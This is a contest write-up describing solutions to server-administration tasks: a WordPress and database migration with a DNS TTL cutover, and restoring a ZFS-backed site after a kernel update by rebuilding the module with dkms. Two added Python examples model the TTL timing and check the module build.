For certain reasons you have decided to migrate ("move house") to another VM.
Complete the migration, aiming for as little downtime (time during which the service cannot be used) as possible.
The destination VM has a web server and a database installed, but they are not configured.
For team A:
Source: q8-a1
Destination: q8-a2
A database also runs inside the VM, so migrate that as well.
The comment-posting feature on articles need not be considered in this task (it is disabled).
Also, when a migration involves changing the IP of a service that is actually published, the DNS must be changed.
Let's actually perform that change too. The IP address set here must be the private IP address.
What goes into hosts is the global IP address, but the DNS setting is the private IP address.
Summary
- Migrate WordPress and the database to the destination VM
- Configure WordPress and the database on the destination VM
- Change the DNS record
- After completing the migration, report to the organisers
Reference URLs
- https://ja.wordpress.org/support/article/how-to-install-wordpress/
- https://ja.wordpress.org/support/article/editing-wp-config-php/
- https://www.conoha.jp/lets-wp/wp-backup/
Things to do before starting the task
Changing the hosts file
Not only for WordPress: when a service is published on the internet it almost always comes with a domain.
This time, please edit your hosts file so that you can access the site by domain name.
On Linux and Mac edit /etc/hosts; on Windows edit C:\Windows\System32\drivers\etc\hosts
+++.++.37.127 mng.aru.local
+++.++.37.126 www.x.aru.local
Configuration information
About each server
Management server
- DNS authoritative server
- Uptime Kuma
A web UI is provided so that DNS records can be edited
http://mng.aru.local:9191/
Check the login user name and password in the configuration information below
Uptime Kuma (https://github.com/louislam/uptime-kuma) is used to monitor the downtime of each server
This is where we check whether your server is available
Mainly used by the organisers
http://mng.aru.local:3001/status/x
WordPress initial page
http://www.x.aru.local/wordpress
Participant servers
The following are installed on the server lent to you
- Apache 2.4.41
- Nginx 1.18.0 (stopped)
- PHP 7.4.3
- MariaDB 10.3.38
- PHPMyAdmin 4.9.5
Also, on the source server the WordPress data is placed in /var/www/html/wordpress
Solution
We migrated just the data with scp, let both servers be accessed, after 5 minutes set the TTL on one side to 1 minute, and finally made only the destination be accessed.
We also took DNS propagation into account, but under these conditions I wonder whether it made any difference... Uptime Kuma's default ping interval is every 60 seconds, so taking that into account it may not have mattered, but who knows.
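The open question in the solution, whether lowering the TTL mattered for a monitor that polls every 60 seconds, can be answered by modelling what a caching resolver hands out over time. The script below is an added example, not part of the original post: it models the TTL being lowered first and the address switched later, with both servers serving during the overlap as the post describes, and simulates a monitor polling through a shared resolver cache. The TTL values, addresses and timings are constructed; times are seconds from the start.

```python
"""Reasoning about DNS TTL and cutover timing for the migration in Problem 8.

Added example, not from the original post. Models a caching resolver during
a TTL-lowering-then-switch migration and checks whether a periodic monitor
could observe the old server after it is turned off.
"""
from dataclasses import dataclass


@dataclass
class Plan:
    old_ip: str
    new_ip: str
    old_ttl: int      # TTL published before the migration, seconds
    new_ttl: int      # lowered TTL, seconds
    lower_at: int     # when the TTL is lowered
    switch_at: int    # when the record is pointed at new_ip


def authoritative(plan, t):
    """(address, ttl) the authoritative server publishes at time t."""
    if t < plan.lower_at:
        return plan.old_ip, plan.old_ttl
    if t < plan.switch_at:
        return plan.old_ip, plan.new_ttl
    return plan.new_ip, plan.new_ttl


class CachingResolver:
    """A resolver that re-fetches only when its cached answer has expired."""

    def __init__(self, plan):
        self.plan, self.cached, self.expires = plan, None, -1

    def lookup(self, t):
        if self.cached is None or t >= self.expires:
            self.cached, ttl = authoritative(self.plan, t)
            self.expires = t + ttl
        return self.cached


def last_possible_old_answer(plan):
    """Latest time any resolver can still return old_ip: a fetch just before
    lower_at carries old_ttl, a fetch just before switch_at carries new_ttl."""
    return max(plan.lower_at + plan.old_ttl, plan.switch_at + plan.new_ttl)


def monitor_sees_outage(plan, old_server_off_at, poll_interval,
                        other_client_times, poll_phase=0):
    """Walk one shared resolver cache through `other_client_times` (moments at
    which some other client queried) and a monitor polling every
    `poll_interval` seconds from `poll_phase`; True if a poll is answered
    with old_ip after the old server has been turned off."""
    horizon = last_possible_old_answer(plan) + poll_interval + 1
    polls = set(range(poll_phase, horizon, poll_interval))
    resolver = CachingResolver(plan)
    for t in sorted(set(other_client_times) | polls):
        ip = resolver.lookup(t)
        if t in polls and ip == plan.old_ip and t >= old_server_off_at:
            return True
    return False


# Constructed plan: TTL 300 s lowered to 60 s at t=0, switch 300 s later.
PLAN = Plan("203.0.113.10", "203.0.113.20", old_ttl=300, new_ttl=60,
            lower_at=0, switch_at=300)

if __name__ == "__main__":
    print("old answers possible until t =", last_possible_old_answer(PLAN))
    for off_at, interval in ((300, 60), (300, 100), (360, 100)):
        seen = monitor_sees_outage(PLAN, off_at, interval, other_client_times=[299])
        print(f"old server off at t={off_at}, monitor every {interval}s -> outage seen: {seen}")
```

The model gives a concrete rule for the situation in the post: keeping the old server serving until `switch_at + new_ttl` (here 60 seconds after the switch) means no monitor, whatever its interval, can be answered with a dead address; switching the old server off at the same moment as the record is only safe when the monitor's own polls happen to refresh the cache before any other client does.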
9. Problem 9
Problem
You are the administrator of a web server (the "ローカルフォー" site on AlmaLinux).
Having been told that a security audit is coming next week, you updated the server's kernel.
When you then rebooted the server, the content of the site disappeared.
Investigate what happened, and fix things so that the site is displayed while booted on the new kernel.
It is OK if the original site is displayed at the following URL.
http://<team's global IP>/
A web console is provided for checking the boot screen
(Clicking it normally may turn into an in-page transition and not display correctly; in that case open it in a new tab from the right-click menu, or copy it and paste it into a new tab)
<http[://]+++.++.++.+:50090/>
Issue a URL for your own team from there and access it.
Solution
yum update kernel-devel
dkms install -m zfs -v 2.1.9 -k 4.18.0-425.19.2.el8_7.x86_64
modprobe zfs
zpool import
zpool import zpool1
Cleared once all three of the following are OK.
uname -a result
Must show version 4.18.0-425.19.2 (because that is the new kernel version)
Linux [hostname] 4.18.0-425.19.2.el8_7.x86_64 #1 SMP Tue Apr 4 05:30:47 EDT 2023 x86_64 x86_64 x86_64 GNU/Linux
The df result must show the following
zpool1/www_html 97G 62G 36G 64% /var/www/html
zpool1 36G 128K 36G 1% /zpool1
Personal impressions
dkms is great.
I had used dkms somewhere before, so I wish I had taken the chance to look into its versatility and use cases as well.
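The failure above is the classic out-of-tree-module case: the site data lived on a ZFS pool, the zfs module had been built through DKMS for the old kernel only, so on the new kernel the module was absent, the pool was not imported and /var/www/html was empty. The check is worth running before the reboot rather than after. The script below is an added example, not part of the original post: it parses `dkms status` output and a df listing, reports whether the module is installed for a given kernel and whether the expected mount is present, and prints the `dkms install` command from the solution for the missing kernel. The sample texts are constructed; the "old" kernel string 4.18.0-425.13.1.el8_7 is an assumed placeholder, the new one is the version named above.

```python
"""Checking that an out-of-tree kernel module is built for the kernel that
will boot next (Problem 9).

Added example, not from the original post. Parses `dkms status` and df
output; the live part compares against `grubby --default-kernel`.
"""
import re
import subprocess

NEW_KERNEL = "4.18.0-425.19.2.el8_7.x86_64"     # from the post
OLD_KERNEL = "4.18.0-425.13.1.el8_7.x86_64"     # assumed placeholder

# Constructed `dkms status` output: zfs built for the old kernel only.
# (dkms 3.x prints "name/version, kernel, arch: state"; dkms 2.x prints
# "name, version, kernel, arch: state"; both forms are accepted below.)
SAMPLE_DKMS_STATUS = f"zfs/2.1.9, {OLD_KERNEL}, x86_64: installed\n"

# Constructed df output; the two zpool1 lines match the ones in the post.
SAMPLE_DF = """\
Filesystem       Size  Used Avail Use% Mounted on
/dev/vda1         40G   12G   29G  30% /
zpool1/www_html   97G   62G   36G  64% /var/www/html
zpool1            36G  128K   36G   1% /zpool1
"""

_DKMS = re.compile(r"^([\w.-]+)[/,]\s*([^,]+),\s*([^,]+),\s*([^,:]+):\s*(\S+)")


def parse_dkms_status(text):
    """Return [(module, version, kernel, arch, state), ...]."""
    entries = []
    for line in text.splitlines():
        m = _DKMS.match(line.strip())
        if m:
            entries.append(tuple(m.groups()))
    return entries


def module_ready(entries, module, kernel):
    """True when `module` is in state 'installed' for `kernel`."""
    return any(e[0] == module and e[2] == kernel and e[4] == "installed"
               for e in entries)


def install_command(entries, module, kernel):
    """The post's fix, using the version DKMS already knows for the module."""
    versions = sorted({e[1] for e in entries if e[0] == module})
    if not versions:
        return None
    return f"dkms install -m {module} -v {versions[-1]} -k {kernel}"


def mounted_from(df_text, mountpoint):
    """The filesystem column of the df line whose mount point matches, or None."""
    for line in df_text.splitlines()[1:]:
        cols = line.split()
        if len(cols) >= 6 and cols[5] == mountpoint:
            return cols[0]
    return None


def report(dkms_text, df_text, module="zfs", kernel=NEW_KERNEL,
           mountpoint="/var/www/html", expect_fs="zpool1/www_html"):
    entries = parse_dkms_status(dkms_text)
    ready = module_ready(entries, module, kernel)
    fs = mounted_from(df_text, mountpoint)
    return {"module_ready": ready, "mounted_ok": fs == expect_fs,
            "fix": None if ready else install_command(entries, module, kernel)}


if __name__ == "__main__":
    # Pre-reboot check on a real host: compare against the kernel that will boot.
    try:
        default = subprocess.run(["grubby", "--default-kernel"], capture_output=True,
                                 text=True, check=True).stdout.strip()
        next_kernel = default.rsplit("vmlinuz-", 1)[-1]
        dkms_out = subprocess.run(["dkms", "status"], capture_output=True, text=True).stdout
        df_out = subprocess.run(["df", "-h"], capture_output=True, text=True).stdout
        print(report(dkms_out, df_out, kernel=next_kernel))
    except (FileNotFoundError, subprocess.CalledProcessError):
        print(report(SAMPLE_DKMS_STATUS, SAMPLE_DF))
```

The `yum update kernel-devel` step in the solution is what makes the `dkms install` possible: DKMS needs the headers of the target kernel to compile the module, and the headers for a freshly installed kernel are not pulled in automatically.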
10. Problem 10
Problem
Rather than a problem, this was a presentation.
Some team gave a very cheerful talk along the lines of "I'll set up a home server when I get home" and "I already run a home server".
A home server is indispensable for learning infrastructure and the like, so I strongly recommend setting one up.
Atogaki (editor's afterword)
As team A, formed with one other participant, we battled the problems set to us. The result was a narrow second place, but what I learned here was very fresh to me. It has become the trigger for wanting to learn all sorts of things, such as server construction, truly from scratch.
Author: 3rd year, Department of Information Engineering, Faculty of Engineering, "[suisan (@u_i_san)]"
※ Change log
5/3 (Wed) 16:40 (current)
The problem statements and explanations will be posted once confirmed.
5/3 (Wed) 19:00
In the middle of adding what can be written without confirmation.
5/8 (Mon) 10:45
Recorded everything.
Got 2nd place
— su-i-san (@u_i_san) April 30, 2023
I learned a lot, so I'll write it up now! Also I'll build a server with constraints!
As for events, I'd like to enter the next ISUCON or something!!
Too many home-server people #GMOkitaQ #DevSecOpsThon pic.twitter.com/93m94L7YiN